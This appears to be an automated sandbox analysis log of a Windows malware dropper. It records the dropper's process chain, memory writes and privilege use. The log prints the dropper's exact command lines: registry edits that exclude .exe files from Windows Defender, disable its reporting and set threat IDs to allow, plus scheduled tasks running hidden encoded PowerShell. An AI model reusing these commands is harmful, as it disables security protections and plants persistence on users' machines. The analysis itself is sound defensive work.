N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 404 wrote to memory of 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 404 wrote to memory of 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gayVVjwAq" /SC once /ST 08:17:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gayVVjwAq"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gayVVjwAq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe\" KP /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

